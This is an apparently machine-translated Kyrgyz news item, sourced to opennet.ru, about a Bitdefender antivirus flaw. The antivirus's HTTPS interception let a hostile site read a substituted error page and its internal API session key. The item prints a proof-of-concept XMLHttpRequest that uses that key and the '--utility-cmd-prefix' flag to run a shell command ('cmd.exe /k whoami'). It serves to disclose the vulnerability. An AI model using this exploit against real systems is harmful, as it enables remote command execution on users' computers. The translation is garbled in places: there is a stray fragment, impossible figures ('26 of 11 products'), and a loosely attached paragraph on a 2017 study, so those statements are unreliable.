Владимир Палант, Adblock Plus түзүүчүсү,
Көйгөйдүн себеби Bitdefender антивирусу сайттын түпнуска TLS сертификатын алмаштыруу менен HTTPS трафигин жергиликтүү кармоону ишке ашырат. Кардардын тутумунда кошумча тамыр сертификаты орнотулган, бул колдонулган жол көзөмөлдөө тутумунун ишин жашырууга мүмкүндүк берет. Антивирус корголгон трафикке кирип, Коопсуз издөө функциясын ишке ашыруу үчүн кээ бир беттерге өзүнүн JavaScript кодун киргизет жана коопсуз туташуу сертификатында көйгөйлөр пайда болгон учурда, ал кайтарылган ката барагын өзүнүн баракчасына алмаштырат. Жаңы ката барагы ачылып жаткан сервердин атынан берилгендиктен, ал сервердеги башка барактар Bitdefender киргизген мазмунга толук кире алышат.
Чабуулчу тарабынан башкарылган сайтты ачууда, ал сайт XMLHttpRequest жөнөтүп, жооп берип жатканда HTTPS тастыктамасы менен көйгөйлөрдү жасай алат, бул Bitdefender тарабынан бурмаланган ката барагынын кайтарылышына алып келет. Ката барагы чабуулчунун доменинин контекстинде ачылгандыктан, ал Bitdefender параметрлери менен жасалма барактын мазмунун окуй алат. Bitdefender тарабынан берилген барак ошондой эле ички Bitdefender API'син колдонууга мүмкүндүк берүүчү сеанс ачкычын камтыйт, ал өзүнчө Safepay серепчи сеансын ишке киргизүү, ыктыярдуу буйрук сабынын желектерин көрсөтүү жана "--utility-cmd-prefix" аркылуу каалаган система буйруктарын ишке киргизүүгө мүмкүндүк берет. желек. Эксплуатациянын мисалы (param1 жана param2 ката барагынан алынган баалуулуктар):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Эске салсак, изилдөө 2017-жылы жүргүзүлгөн
11 өнүмдөрдүн 26и гана учурдагы шифр топтомун камсыз кылган. 5 система сертификаттарды текшерген жок (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security жана Total Security өнүмдөрү чабуулга дуушар болгон
Source: opennet.ru